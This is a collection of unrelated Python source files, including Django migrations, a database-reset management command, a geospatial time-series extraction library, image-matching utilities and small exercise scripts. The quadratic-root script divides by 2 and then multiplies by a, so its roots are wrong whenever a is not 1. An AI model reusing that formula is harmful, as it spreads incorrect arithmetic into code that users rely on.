If '1x_2y,2y_3y' is passed, both polarizations 'xy' and 'yy' will
be kept for both baselines (1, 2) and (2, 3) to return a valid
pyuvdata object.
An ant_str cannot be passed in addition to any of `antenna_nums`,
`antenna_names`, `bls` args or the `polarizations` parameters,
if it is a ValueError will be raised.
frequencies : array_like of float, optional
The frequencies to include when writing data into the file, each
value passed here should exist in the freq_array.
freq_chans : array_like of int, optional
The frequency channel numbers to include writing data into the file.
times : array_like of float, optional
The times to include when writing data into the file, each value
passed here should exist in the time_array.
polarizations : array_like of int, optional
The polarizations numbers to include when writing data into the file,
each value passed here should exist in the polarization_array.
blt_inds : array_like of int, optional
The baseline-time indices to include when writing data into the file.
This is not commonly used.
add_to_history : str
String to append to history before write out. Default is no appending.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters before
writing the file (the default is True, meaning the acceptable
range check will be done).
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
"""
uvh5_obj = self._convert_to_filetype("uvh5")
uvh5_obj.write_uvh5_part(
filename,
data_array,
flags_array,
nsample_array,
check_header=check_header,
antenna_nums=antenna_nums,
antenna_names=antenna_names,
bls=bls,
ant_str=ant_str,
frequencies=frequencies,
freq_chans=freq_chans,
times=times,
polarizations=polarizations,
blt_inds=blt_inds,
add_to_history=add_to_history,
run_check_acceptability=run_check_acceptability,
)
del uvh5_obj
| StarcoderdataPython |
1781534 | <gh_stars>0
# Generated by Django 3.2.6 on 2021-11-26 19:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('storehouse', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='user',
name='age',
field=models.CharField(blank=True, max_length=50),
),
migrations.AddField(
model_name='user',
name='bio',
field=models.TextField(blank=True, max_length=200),
),
migrations.AddField(
model_name='user',
name='phone',
field=models.CharField(blank=True, max_length=50),
),
]
| StarcoderdataPython |
99136 | <gh_stars>0
# coding: utf-8
import os
import sys
import glob
from pathlib import Path
image_ext = ['.JPG', '.jpg', '.jpeg','.JPEG','.png','.bmp']
def create_match_file_list(image_path, match_folder_file, match_list_file):
with open(match_list_file, "w") as fout:
# fid.write(HEADER)
# for _, cam in cameras.items():
# to_write = [cam.id, cam.model, cam.width, cam.height, *cam.params]
# line = " ".join([str(elem) for elem in to_write])
# fid.write(line + "\n")
with open(match_folder_file, "r") as fid:
while True:
line = fid.readline()
if not line:
break
line = line.strip()
if len(line) > 0 and line[0] != "#":
elems = line.split()
folder1 = elems[0]
folder2 = elems[1]
images1 = searchDirFile(image_path + '/' + folder1, image_ext)
images2 = searchDirFile(image_path + '/' + folder2, image_ext)
for image1 in images1:
name1 = image1.replace(image_path + '/', '')
for image2 in images2:
name2 = image2.replace(image_path + '/', '')
fout.write(name1 + ' ' + name2 + "\n")
def create_match_pair(image_path, folder1, folder2, image_ext):
image_pairs = []
images1 = searchDirFile(folder1, image_ext)
images2 = searchDirFile(folder2, image_ext)
for image1 in images1:
name1 = image1.replace(image_path + '/', '')
for image2 in images2:
name2 = image2.replace(image_path + '/', '')
image_pairs.append([name1, name2])
return image_pairs
def searchDirFile(rootDir, suffix):
res = []
for dir_or_file in os.listdir(rootDir):
filePath = os.path.join(rootDir, dir_or_file)
# 判断是否为文件
if os.path.isfile(filePath):
# 如果是文件再判断是否以.jpg结尾,不是则跳过本次循环
for ext in suffix:
if os.path.basename(filePath).endswith(ext):
res.append(os.path.join(rootDir, os.path.basename(filePath)))
else:
continue
# 如果是个dir,则再次调用此函数,传入当前目录,递归处理。
elif os.path.isdir(filePath):
subres = searchDirFile(filePath, suffix)
res = res + subres
else:print('not file and dir ' + os.path.basename(filePath))
return res
def getFiles(dir, suffix):
res = []
for root, directory, files in os.walk(dir):
for filename in files:
name, suf = os.path.splitext(filename)
for ext in suffix:
if suf == ext:
res.append(os.path.join(root, filename))
return res
def main():
res = searchDirFile("/media/netease/Storage/LargeScene/Scene/XixiWetland/colmap_model/xray_test_material/images", ["jpg", "png"])
print(res)
# create_match_file_list(
# sys.argv[1],
# sys.argv[2],
# sys.argv[3],
# )
if __name__ == "__main__":
main()
| StarcoderdataPython |
3337397 | <gh_stars>1-10
"""
reset_db
========
Django command to drop and recreate a database.
Useful when running tests against a database which may previously have
had different migrations applied to it.
This handles the one specific use case of the "reset_db" command from
django-extensions that we were actually using.
originally from http://www.djangosnippets.org/snippets/828/ by dnordberg
"""
import logging
import configparser
import django
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
class Command(BaseCommand): # lint-amnesty, pylint: disable=missing-class-docstring
help = "Resets the database for this project."
def add_arguments(self, parser):
parser.add_argument(
'-R', '--router', action='store', dest='router', default='default',
help='Use this router-database other than defined in settings.py')
def handle(self, *args, **options): # lint-amnesty, pylint: disable=too-many-statements
"""
Resets the database for this project.
Note: Transaction wrappers are in reverse as a work around for
autocommit, anybody know how to do this the right way?
"""
router = options.get('router')
dbinfo = settings.DATABASES.get(router)
if dbinfo is None:
raise CommandError("Unknown database router %s" % router)
engine = dbinfo.get('ENGINE').split('.')[-1]
user = password = database_name = database_host = database_port = ''
if engine == 'mysql':
(user, password, database_name, database_host, database_port) = parse_mysql_cnf(dbinfo)
user = dbinfo.get('USER') or user
password = dbinfo.get('PASSWORD') or password
owner = user
database_name = dbinfo.get('NAME') or database_name
if database_name == '':
raise CommandError("You need to specify DATABASE_NAME in your Django settings file.")
database_host = dbinfo.get('HOST') or database_host
database_port = dbinfo.get('PORT') or database_port
verbosity = int(options.get('verbosity', 1))
if engine in ('sqlite3', 'spatialite'):
import os
try:
logging.info("Unlinking %s database", engine)
os.unlink(database_name)
except OSError:
pass
elif engine in ('mysql',):
import MySQLdb as Database
kwargs = {
'user': user,
'passwd': password,
}
if database_host.startswith('/'):
kwargs['unix_socket'] = database_host
else:
kwargs['host'] = database_host
if database_port:
kwargs['port'] = int(database_port)
connection = Database.connect(**kwargs)
drop_query = 'DROP DATABASE IF EXISTS `%s`' % database_name
utf8_support = 'CHARACTER SET utf8'
create_query = f'CREATE DATABASE `{database_name}` {utf8_support}'
logging.info('Executing... "' + drop_query + '"') # lint-amnesty, pylint: disable=logging-not-lazy
connection.query(drop_query)
logging.info('Executing... "' + create_query + '"') # lint-amnesty, pylint: disable=logging-not-lazy
connection.query(create_query)
elif engine in ('postgresql', 'postgresql_psycopg2', 'postgis'):
if engine == 'postgresql' and django.VERSION < (1, 9):
import psycopg as Database # NOQA # lint-amnesty, pylint: disable=import-error
elif engine in ('postgresql', 'postgresql_psycopg2', 'postgis'):
import psycopg2 as Database # NOQA # lint-amnesty, pylint: disable=import-error
conn_params = {'database': 'template1'}
if user:
conn_params['user'] = user
if password:
conn_params['password'] = password
if database_host:
conn_params['host'] = database_host
if database_port:
conn_params['port'] = database_port
connection = Database.connect(**conn_params)
connection.set_isolation_level(0) # autocommit false
cursor = connection.cursor()
drop_query = "DROP DATABASE \"%s\";" % database_name
logging.info('Executing... "' + drop_query + '"') # lint-amnesty, pylint: disable=logging-not-lazy
try:
cursor.execute(drop_query)
except Database.ProgrammingError as e:
logging.exception("Error: %s", e)
create_query = "CREATE DATABASE \"%s\"" % database_name
if owner:
create_query += " WITH OWNER = \"%s\" " % owner
create_query += " ENCODING = 'UTF8'"
if engine == 'postgis' and django.VERSION < (1, 9):
# For PostGIS 1.5, fetch template name if it exists
from django.contrib.gis.db.backends.postgis.base import DatabaseWrapper
postgis_template = DatabaseWrapper(dbinfo).template_postgis # lint-amnesty, pylint: disable=no-member
if postgis_template is not None:
create_query += ' TEMPLATE = %s' % postgis_template
if settings.DEFAULT_TABLESPACE:
create_query += ' TABLESPACE = %s;' % settings.DEFAULT_TABLESPACE
else:
create_query += ';'
logging.info('Executing... "' + create_query + '"') # lint-amnesty, pylint: disable=logging-not-lazy
cursor.execute(create_query)
else:
raise CommandError("Unknown database engine %s" % engine)
if verbosity >= 2:
print("Reset successful.")
def parse_mysql_cnf(dbinfo):
"""
Attempt to parse mysql database config file for connection settings.
Ideally we would hook into django's code to do this, but read_default_file is handled by the mysql C libs
so we have to emulate the behaviour
Settings that are missing will return ''
returns (user, password, database_name, database_host, database_port)
"""
read_default_file = dbinfo.get('OPTIONS', {}).get('read_default_file')
if read_default_file:
config = configparser.RawConfigParser({
'user': '',
'password': '',
'database': '',
'host': '',
'port': '',
'socket': '',
})
import os
config.read(os.path.expanduser(read_default_file))
try:
user = config.get('client', 'user')
password = config.get('client', 'password')
database_name = config.get('client', 'database')
database_host = config.get('client', 'host')
database_port = config.get('client', 'port')
socket = config.get('client', 'socket')
if database_host == 'localhost' and socket:
# mysql actually uses a socket if host is localhost
database_host = socket
return user, password, database_name, database_host, database_port
except configparser.NoSectionError:
pass
return '', '', '', '', ''
| StarcoderdataPython |
1601901 | <filename>src/Hero.py
#!/usr/bin/python
class Hero(object):
def __init__(self, Name):
self.name = Name
| StarcoderdataPython |
1773105 | """
Author: <NAME>
Copyright: <NAME>, RCH Engineering, 2021
License: BSD Clear 3 Clause License
All rights reserved
"""
import datetime
import os
import warnings
import affine
import geopandas as gpd
import h5py
import netCDF4 as nc
import numpy as np
import pandas as pd
import rasterio.features as riof
import requests
import xarray as xr
from pydap.cas.urs import setup_session
try:
import pygrib
except ImportError:
pygrib = None
from ._coords import _map_coords_to_slice
from ._utils import _assign_eng
from ._utils import _guess_time_var
from ._utils import _array_by_eng
from ._utils import _array_to_stat_list
from ._utils import _attr_by_eng
from ._utils import _delta_to_time
from ._utils import _gen_stat_list
from ._consts import ALL_ENGINES
from ._consts import SPATIAL_X_VARS
from ._consts import SPATIAL_Y_VARS
__all__ = ['TimeSeries', ]
class TimeSeries:
"""
Creates a time series of values from arrays contained in netCDF, grib, hdf, or geotiff formats. Values in the
series are extracted by specifying coordinates of a point, range of coordinates, a spatial data file, or computing
statistics for the entire array.
Args:
files (list): A list (even if len==1) of either absolute file paths to netcdf, grib, hdf5, or geotiff files or
urls to an OPeNDAP service (but beware the data transfer speed bottleneck)
var (str or int or list or tuple): The name of the variable(s) to query as they are stored in the file
(e.g. often 'temp' or 'T' instead of Temperature) or the band number if you are using grib files *and* you
specify the engine as pygrib. If the var is contained in a group, include the group name as a unix style
path e.g. 'group_name/var'.
dim_order (tuple): A tuple of the names of the dimensions/coordinate variables for all of the variables listed
in the "var" parameter, listed in order. If the coordinate variables are contained in a group, include the
group name as a unix style path e.g. 'group_name/coord_var'.
Keyword Args:
t_var (str): Name of the time dimension/coordinate variable if it is used in the data. Grids will attempt to
guess if it is not "time" and you do not specify one with this argument.
x_var (str): Name of the x dimension/coordinate variable if it is used in the data. Grids will attempt to
guess if it is not specified and not a standard name.
y_var (str): Name of the y dimension/coordinate variable if it is used in the data. Grids will attempt to
guess if it is not specified and not a standard name.
engine (str): the python package used to power the file reading. Defaults to best for the type of input data.
The options include 'xarray', 'opendap', 'auth-opendap', 'netcdf4', 'cfgrib', 'pygrib', 'h5py', 'rasterio'
xr_kwargs (dict): A dictionary of kwargs that you might need when opening complex grib files with xarray
user (str): a username used for authenticating remote datasets, if required by your remote data source
pswd (str): a password used for authenticating remote datasets, if required by your remote data source
session (requests.Session): a requests Session object preloaded with credentials/tokens for authentication
stats (str or tuple): How to reduce arrays of values to a single value in the series dataframe.
Provide a list of strings (e.g. ['mean', 'max']), or a comma separated string (e.g. 'mean,max,min').
Options include: mean, median, max, min, sum, std, or a percentile (e.g. '25%').
Or, provide 'all' which is interpreted as (mean, median, max, min, sum, std, ).
Or, provide 'box' or 'boxplot' which is interpreted as (max, 75%, median, mean, 25%, min, ).
Or, provide 'values' to get a flat list of all non-null values in the query so you can compute other stats.
fill_value (int): The value used for filling no_data/null values in the variable's array. Default: -9999.0
interp_units (bool): If your data conforms to the CF NetCDF standard for time data, choose True to
convert the values in the time variable to datetime strings in the pandas output. The units string for the
time variable of each file is checked separately unless you specify it in the unit_str parameter.
origin_format (str): A datetime.strptime string for extracting the origin time from the units string.
unit_str (str): a CF Standard conforming string indicating how the spacing and origin of the time values.
This is helpful if your files do not contain a units string. Only specify this if ALL files that you query
use the same units string. Usually this looks like "step_size since YYYY-MM-DD HH:MM:SS" such as
"days since 2000-01-01 00:00:00".
strp_filename (str): A datetime.strptime string for extracting datetimes from patterns in file names. Only for
datasets which contain 1 time step per file.
Methods:
point: Extracts a time series of values at a point for a given coordinate pair
multipoint: Extracts a time series of values for several points given a series of coordinate values
bound: Extracts a time series of values with a bounding box for each requested statistic
range: Alias for TimeSeries.bound()
shape: Extracts a time series of values on a line or within a polygon for each requested statistic
"""
# core parameters from user
files: list
var: tuple
dim_order: tuple
# handling non-standard dimension names or organizations
t_var: str
x_var: str
y_var: str
# help opening data
engine: str
xr_kwargs: dict
user: str
pswd: str
session: requests.session
# reducing arrays to numbers
stats: str or list or tuple or np.ndarray
fill_value: int or float or bool
# how to handle the time data
interp_units: bool
origin_format: str
unit_str: str
strp_filename: str
t_index: int # derived from dim_order and t_var
t_var_in_dims: bool # derived from dim_order and t_var
def __init__(self, files: list, var: str or int or list or tuple, dim_order: tuple, **kwargs):
# parameters configuring how the data is interpreted
self.files = (files,) if isinstance(files, str) else files
self.variables = (var,) if isinstance(var, str) else var
assert len(self.variables) >= 1, 'specify at least 1 variable'
self.dim_order = dim_order
# optional parameters describing how to access the data
self.engine = kwargs.get('engine', _assign_eng(files[0]))
assert self.engine in ALL_ENGINES, f'engine "{self.engine}" not recognized'
self.xr_kwargs = kwargs.get('xr_kwargs', None)
# optional parameters modifying how dimension/coordinate variable names are interpreted
self.t_var = kwargs.get('t_var', None)
self.x_var = kwargs.get('x_var', None)
self.y_var = kwargs.get('y_var', None)
if self.x_var is None:
for a in self.dim_order:
if a in SPATIAL_X_VARS:
self.x_var = a
if self.y_var is None:
for a in self.dim_order:
if a in SPATIAL_Y_VARS:
self.y_var = a
if self.t_var is None:
self.t_var = _guess_time_var(dim_order)
self.t_var_in_dims = self.t_var in self.dim_order
self.t_index = self.dim_order.index(self.t_var) if self.t_var_in_dims else False
# additional options describing how the time data should be interpreted
self.interp_units = kwargs.get('interp_units', False)
self.strp_filename = kwargs.get('strp_filename', False)
self.unit_str = kwargs.get('unit_str', None)
self.origin_format = kwargs.get('origin_format', '%Y-%m-%d %X')
# optional parameter modifying which statistics to process
self.stats = _gen_stat_list(kwargs.get('stats', ('mean',)))
self.fill_value = kwargs.get('fill_value', -9999.0)
# optional authentication for remote datasets
self.user = kwargs.get('user', None)
self.pswd = kwargs.get('pswd', None)
self.session = kwargs.get('session', False)
if 'opendap' in self.engine and not self.session and self.user is not None and self.pswd is not None:
a = requests.Session()
a.auth = (self.user, self.pswd)
self.session = a
# validate that some parameters are compatible
if self.engine == 'rasterio':
assert isinstance(self.variables, int), 'GeoTIFF variables must be integer band numbers'
if not self.dim_order == ('y', 'x'):
warnings.warn('For GeoTIFFs, the correct dim order is ("y", "x")')
self.dim_order = ('y', 'x')
elif self.engine == 'pygrib':
if pygrib is None:
raise ModuleNotFoundError('pygrib engine only available if optional pygrib dependency is installed')
assert isinstance(self.variables, int), 'pygrib engine variables must be integer band numbers'
def __bool__(self):
return True
def __str__(self):
string = 'grids.TimeSeries'
for p in vars(self):
if p == 'files':
string += f'\n\t{p}: {len(self.__getattribute__(p))}'
else:
string += f'\n\t{p}: {self.__getattribute__(p)}'
return string
def __repr__(self):
return self.__str__()
def point(self,
*coords: int or float or None, ) -> pd.DataFrame:
"""
Extracts a time series at a point for a given series of coordinate values
Args:
coords (int or float or None): provide a coordinate value (integer or float) for each dimension of the
array which you are creating a time series for. You need to provide exactly the same number of
coordinates as there are dimensions
Returns:
pandas.DataFrame with an index, a column named datetime, and a column named values.
"""
assert len(self.dim_order) == len(coords), 'Specify 1 coordinate for each dimension of the array'
# make the return item
results = dict(datetime=[])
for var in self.variables:
results[var] = []
# map coordinates -> cell indices -> python slice() objects
slices = self._gen_dim_slices(coords, 'point')
# iterate over each file extracting the value and time for each
for num, file in enumerate(self.files):
# open the file
opened_file = self._open_data(file)
tsteps, tslices = self._handle_time(opened_file, file, (coords, coords))
results['datetime'] += list(tsteps)
slices[self.t_index] = tslices if self.t_var_in_dims else slices[self.t_index]
for var in self.variables:
# extract the appropriate values from the variable
vs = _array_by_eng(opened_file, var, tuple(slices))
if vs.ndim == 0:
if vs == self.fill_value:
vs = np.nan
results[var].append(vs)
elif vs.ndim == 1:
vs[vs == self.fill_value] = np.nan
for v in vs:
results[var].append(v)
else:
raise ValueError('Too many dimensions remain after slicing')
if self.engine != 'pygrib':
opened_file.close()
# return the data stored in a dataframe
return pd.DataFrame(results)
def multipoint(self,
*coords: list,
labels: list = None, ) -> pd.DataFrame:
"""
Extracts a time series at many points for a given series of coordinate values. Each point should have the same
time coordinate and different coordinates for each other dimension.
Args:
coords (int or float or None): a list of coordinate tuples or a 2D numpy array. Each coordinate pair in
the list should provide a coordinate value (integer or float) for each dimension of the array, e.g.
len(coordinate_pair) == len(dim_order). See TimeSeries.point for more explanation.
labels (list): an optional list of strings which label each of the coordinates provided. len(labels) should
be equal to len(coords)
Returns:
pandas.DataFrame with an index, a column named datetime, and a column named values.
"""
assert len(self.dim_order) == len(coords[0]), 'Specify 1 coordinate for each dimension of the array'
if labels is None:
labels = [f'point{i}' for i in range(len(coords))]
assert len(labels) == len(coords), 'You must provide a label for each point or use auto numbering'
datalabels = []
for label in labels:
for var in self.variables:
datalabels.append(f'{var}_{label}')
# make the return item
results = dict(datetime=[])
for datalabel in datalabels:
results[datalabel] = []
# map coordinates -> cell indices -> python slice() objects
slices = self._gen_dim_slices(coords, 'multipoint')
# iterate over each file extracting the value and time for each
for file in self.files:
opened_file = self._open_data(file)
tsteps, tslices = self._handle_time(opened_file, file, (coords[0], coords[0]))
results['datetime'] += list(tsteps)
for var in self.variables:
for i, slc in enumerate(slices):
slc[self.t_index] = tslices if self.t_var_in_dims else slc[self.t_index]
# extract the appropriate values from the variable
vs = _array_by_eng(opened_file, var, tuple(slc))
if vs.ndim == 0:
if vs == self.fill_value:
vs = np.nan
results[f'{var}_{labels[i]}'].append(vs)
elif vs.ndim == 1:
vs[vs == self.fill_value] = np.nan
for v in vs:
results[f'{var}_{labels[i]}'].append(v)
else:
raise ValueError('There are too many dimensions after slicing')
if self.engine != 'pygrib':
opened_file.close()
# return the data stored in a dataframe
return pd.DataFrame(results)
def bound(self,
min_coords: tuple,
max_coords: tuple,
stats: str or tuple = None, ) -> pd.DataFrame:
"""
Args:
min_coords (tuple): a tuple containing minimum coordinates of a bounding box range- coordinates given
in order of the dimensions of the source arrays.
max_coords (tuple): a tuple containing maximum coordinates of a bounding box range- coordinates given
in order of the dimensions of the source arrays.
stats (str or tuple): How to reduce arrays of values to a single value for the series. See class docstring.
Returns:
pandas.DataFrame with an index, a datetime column, and a column named for each statistic specified
"""
assert len(self.dim_order) == len(min_coords) == len(max_coords), \
'Specify 1 min and 1 max coordinate for each dimension'
# handle the optional arguments
self.stats = _gen_stat_list(stats) if stats is not None else self.stats
# make the return item
results = dict(datetime=[])
# add a list for each stat requested
for var in self.variables:
for stat in self.stats:
results[f'{var}_{stat}'] = []
# map coordinates -> cell indices -> python slice() objects
slices = self._gen_dim_slices((min_coords, max_coords), 'range')
# iterate over each file extracting the value and time for each
for file in self.files:
# open the file
opened_file = self._open_data(file)
tsteps, tslices = self._handle_time(opened_file, file, (min_coords, max_coords))
results['datetime'] += list(tsteps)
slices[self.t_index] = tslices if self.t_var_in_dims else slices[self.t_index]
for var in self.variables:
# slice the variable's array, returns array with shape corresponding to dimension order and size
vs = _array_by_eng(opened_file, var, tuple(slices))
vs[vs == self.fill_value] = np.nan
for stat in self.stats:
results[f'{var}_{stat}'] += _array_to_stat_list(vs, stat)
if self.engine != 'pygrib':
opened_file.close()
# return the data stored in a dataframe
return pd.DataFrame(results)
def range(self,
min_coordinates: tuple,
max_coordinates: tuple,
stats: str or tuple = None, ) -> pd.DataFrame:
"""
Alias for TimeSeries.bound(). Refer to documentation for the bound method.
"""
return self.bound(min_coordinates, max_coordinates, stats)
def shape(self,
mask: str or np.ndarray,
time_range: tuple = (None, None),
behavior: str = 'dissolve',
label_attr: str = None,
feature: str = None,
stats: str or tuple = None, ) -> pd.DataFrame:
"""
Applicable only to source data with exactly 2 spatial dimensions, x and y, and a time dimension.
Args:
mask (str): path to any spatial polygon file, e.g. shapefile or geojson, which can be read by gpd.
time_range: a tuple of the min and max time range to query a time series for
behavior (str): determines how the vector data is used to mask the arrays. Options are: dissolve, features
- dissolve: treats all features as if they were 1 feature and masks the entire set of polygons in 1 grid
- features: treats each feature as a separate entity, must specify an attribute shared by each feature
with unique values for each feature used to label the resulting series
label_attr: The name of the attribute in the vector data features to label the several outputs
feature: A value of the label_attr attribute for 1 or more features found in the provided shapefile
stats (str or tuple): How to reduce arrays of values to a single value for the series. See class docstring.
Returns:
pandas.DataFrame with an index, a datetime column, and a column named for each statistic specified
"""
if not len(self.dim_order) == 3:
raise RuntimeError('You can only extract by polygon if the data is exactly 3 dimensional: time, y, x')
# cache the behavior and organization parameters
self.stats = _gen_stat_list(stats) if stats is not None else self.stats
if isinstance(mask, str):
masks = self._create_spatial_mask_array(mask, behavior, label_attr, feature)
elif isinstance(mask, np.ndarray):
masks = ['masked', mask]
else:
raise ValueError('Unusable data provided for the "mask" argument')
# make the return item
results = dict(datetime=[])
for mask in masks:
for stat in self.stats:
for var in self.variables:
results[f'{var}_{mask[0]}_{stat}'] = []
# slice data on all dimensions
slices = [slice(None), ] * len(self.dim_order)
# iterate over each file extracting the value and time for each
for file in self.files:
# open the file
opened_file = self._open_data(file)
tsteps, tslices = self._handle_time(opened_file, file, (time_range[0], time_range[1]))
results['datetime'] += list(tsteps)
slices[self.t_index] = tslices if self.t_var_in_dims else slices[self.t_index]
num_time_steps = len(tsteps)
for var in self.variables:
# slice the variable's array, returns array with shape corresponding to dimension order and size
for i in range(num_time_steps):
slices[self.t_index] = slice(i, i + 1)
vals = _array_by_eng(opened_file, var, tuple(slices))
for mask in masks:
masked_vals = np.where(mask[1], vals, np.nan).squeeze()
masked_vals[masked_vals == self.fill_value] = np.nan
for stat in self.stats:
results[f'{var}_{mask[0]}_{stat}'] += _array_to_stat_list(masked_vals, stat)
if self.engine != 'pygrib':
opened_file.close()
# return the data stored in a dataframe
return pd.DataFrame(results)
def _gen_dim_slices(self,
coords: tuple,
slice_style: str):
if self.engine == 'pygrib':
revert_engine = self.engine
self.engine = 'cfgrib'
else:
revert_engine = False
slices = []
tmp_file = self._open_data(self.files[0])
if slice_style in ('point', 'range'):
for index, dim in enumerate(self.dim_order):
if dim == self.t_var:
slices.append(None)
continue
vals = _array_by_eng(tmp_file, dim)
if slice_style == 'point':
slices.append(_map_coords_to_slice(vals, coords[index], coords[index], dim))
else:
slices.append(_map_coords_to_slice(vals, coords[0][index], coords[1][index], dim))
elif slice_style == 'multipoint':
for index, dim in enumerate(self.dim_order):
if dim == self.t_var:
slices.append([None, ] * len(coords))
continue
vals = _array_by_eng(tmp_file, dim)
dim_slices = []
for coord in coords:
dim_slices.append(_map_coords_to_slice(vals, coord[index], coord[index], dim))
slices.append(dim_slices)
slices = np.transpose(slices)
else:
raise RuntimeError("Slice behavior not implemented")
if revert_engine:
self.engine = revert_engine
return slices
def _create_spatial_mask_array(self, vector: str, behavior: str, label_attr: str, feature: str) -> np.ma:
if self.x_var is None or self.y_var is None:
raise ValueError('Unable to determine x and y dimensions')
sample_data = self._open_data(self.files[0])
x = _array_by_eng(sample_data, self.x_var)
y = _array_by_eng(sample_data, self.y_var)
if self.engine != 'pygrib':
sample_data.close()
# catch the case when people use improper 2d instead of proper 1d coordinate dimensions
if x.ndim == 2:
x = x[0, :]
if y.ndim == 2:
y = y[:, 0]
# check if you need to vertically invert the array mask (if y vals go from small to large)
# or if you need to transpose the mask (if the dimensions go x then y, should be y then x- think of the shape)
invert = y[-1] > y[0]
transpose = self.dim_order.index(self.x_var) < self.dim_order.index(self.y_var)
# read the shapefile
vector_gdf = gpd.read_file(vector)
# set up the variables to create and storing masks
masks = []
# what is the shape of the grid to be masked
gshape = (y.shape[0], x.shape[0],)
# calculate the affine transformation of the grid to be masked
aff = affine.Affine(np.abs(x[1] - x[0]), 0, x.min(), 0, np.abs(y[1] - y[0]), y.min())
# creates a binary/boolean mask of the shapefile
# in the same crs, over the affine transform area, for a certain masking behavior
if behavior == 'dissolve':
m = riof.geometry_mask(vector_gdf.geometry, gshape, aff, invert=invert)
if transpose:
m = np.transpose(m)
masks.append(('shape', m))
elif behavior == 'feature':
assert label_attr in vector_gdf.keys(), \
'label_attr parameter not found in attributes list of the vector data'
assert feature is not None, \
'Provide a value for the feature argument to query for certain features'
vector_gdf = vector_gdf[vector_gdf[label_attr] == feature]
assert not vector_gdf.empty, f'No features have value "{feature}" for attribute "{label_attr}"'
m = riof.geometry_mask(vector_gdf.geometry, gshape, aff, invert=invert)
if transpose:
m = np.transpose(m)
masks.append((feature, m))
elif behavior == 'features':
assert label_attr in vector_gdf.keys(), \
'label_attr parameter not found in attributes list of the vector data'
for idx, row in vector_gdf.iterrows():
m = riof.geometry_mask(gpd.GeoSeries(row.geometry), gshape, aff, invert=invert)
if transpose:
m = np.transpose(m)
masks.append((row[label_attr], m))
return masks
def _handle_time(self, opened_file, file_path: str, time_range: tuple) -> tuple:
if self.strp_filename: # strip the datetime from the file name
tvals = [datetime.datetime.strptime(os.path.basename(file_path), self.strp_filename), ]
elif self.engine == 'pygrib':
tvals = [opened_file[self.variables].validDate, ]
else:
tvals = _array_by_eng(opened_file, self.t_var)
if isinstance(tvals, np.datetime64):
tvals = [tvals]
if tvals.ndim == 0:
...
else:
tvals = [t for t in tvals]
# convert the time variable array's numbers to datetime representations
if self.interp_units:
if self.engine == 'xarray':
...
elif self.unit_str is None:
tvals = _delta_to_time(tvals, _attr_by_eng(opened_file, self.t_var, 'units'), self.origin_format)
else:
tvals = _delta_to_time(tvals, self.unit_str, self.origin_format)
tvals = np.array(tvals)
# if the variable depends on time then there should be a coordinate provided for it
if self.t_var_in_dims:
t1 = time_range[0]
t2 = time_range[1]
if isinstance(t1, list) or isinstance(t1, tuple):
t1 = t1[self.t_index]
if isinstance(t2, list) or isinstance(t2, tuple):
t2 = t2[self.t_index]
# otherwise, no time coordinates provided.
else:
t1 = None
t2 = None
time_slices = _map_coords_to_slice(tvals, t1, t2, 'time')
return tvals[(time_slices,)], time_slices
def _open_data(self, path):
if self.engine == 'xarray':
return xr.open_dataset(path, backend_kwargs=self.xr_kwargs)
elif self.engine == 'opendap':
try:
if self.session:
return xr.open_dataset(xr.backends.PydapDataStore.open(path, session=self.session))
else:
return xr.open_dataset(path)
except ConnectionRefusedError as e:
raise e
except Exception as e:
print('Unexpected Error')
raise e
elif self.engine == 'auth-opendap':
return xr.open_dataset(xr.backends.PydapDataStore.open(
path, session=setup_session(self.user, self.pswd, check_url=path)))
elif self.engine == 'netcdf4':
return nc.Dataset(path, 'r')
elif self.engine == 'cfgrib':
return xr.open_dataset(path, engine='cfgrib', backend_kwargs=self.xr_kwargs)
elif self.engine == 'pygrib':
a = pygrib.open(path)
return a.read()
elif self.engine == 'h5py':
return h5py.File(path, 'r')
elif self.engine == 'rasterio':
return xr.open_rasterio(path)
else:
raise ValueError(f'Unable to open file, unsupported engine: {self.engine}')
| StarcoderdataPython |
42171 | # Problem Statement: https://leetcode.com/problems/climbing-stairs/
class Solution:
def climbStairs(self, n: int) -> int:
# Base Cases
if n==1:
return 1
if n==2:
return 2
# Memoization
memo_table = [1]*(n+1)
# Initialization
memo_table[1] = 1
memo_table[2] = 2
# Iterative solution Memoization
for i in range(3, n+1):
memo_table[i] = memo_table[i-1]+memo_table[i-2]
return memo_table[n] | StarcoderdataPython |
3255522 | from tmeister import cron
if __name__ == '__main__':
cron.run()
| StarcoderdataPython |
1689145 | <filename>Week3/02_Execucao-Condicional/Desafio_bhaskara.py
import math
a = float(input("Digite o valor de a: "))
b = float(input("Digite o valor de b: "))
c = float(input("Digite o valor de c: "))
delta = (b ** 2) - (4 * a * c)
print(delta)
if (delta == 0):
x = (-b + math.sqrt(delta)) / 2 * a
print("A única raiz é:",x)
else:
if (delta < 0):
print("Esta equação não possui raizes reais!")
else:
x1 = (-b - math.sqrt(delta)) / 2 * a
x2 = (-b + math.sqrt(delta)) / 2 * a
print("A primeira raiz é: %d!\nA segunda raiz é: %d!" %(x1,x2)) | StarcoderdataPython |
168033 | from django.contrib import admin
from .models import Class, Studio
# Register your models here.
admin.site.register(Class)
admin.site.register(Studio)
| StarcoderdataPython |
164871 | <filename>src/utils/FastClassAI_cnn_models.py<gh_stars>1-10
# ********************************************************************************** #
# #
# Project: FastClassAI workbecnch #
# #
# Author: <NAME> #
# Contact: <EMAIL> #
# #
# This notebook is a part of Skin AanaliticAI development kit, created #
# for evaluation of public datasets used for skin cancer detection with #
# large number of AI models and data preparation pipelines. #
# #
# License: MIT #
# Copyright (C) 2021.01.30 <NAME> #
# https://opensource.org/licenses/MIT #
# #
# ********************************************************************************** #
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os # allow changing, and navigating files and folders,
import sys
import re # module to use regular expressions,
import glob # lists names in folders that match Unix shell patterns
import random # functions that use and generate random numbers
import numpy as np # support for multi-dimensional arrays and matrices
import pandas as pd # library for data manipulation and analysis
import seaborn as sns # advance plots, for statistics,
import matplotlib.pyplot as plt # for making plots,
import matplotlib as mpl # to get some basif functions, heping with plot mnaking
import tensorflow as tf
import tensorflow_hub as hub
import scipy.stats as stats # library for statistics and technical programming,
import tensorflow.keras as keras
from sklearn.metrics import accuracy_score
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import ParameterGrid
from sklearn.dummy import DummyClassifier
from sklearn.tree import DecisionTreeClassifier # accepts only numerical data
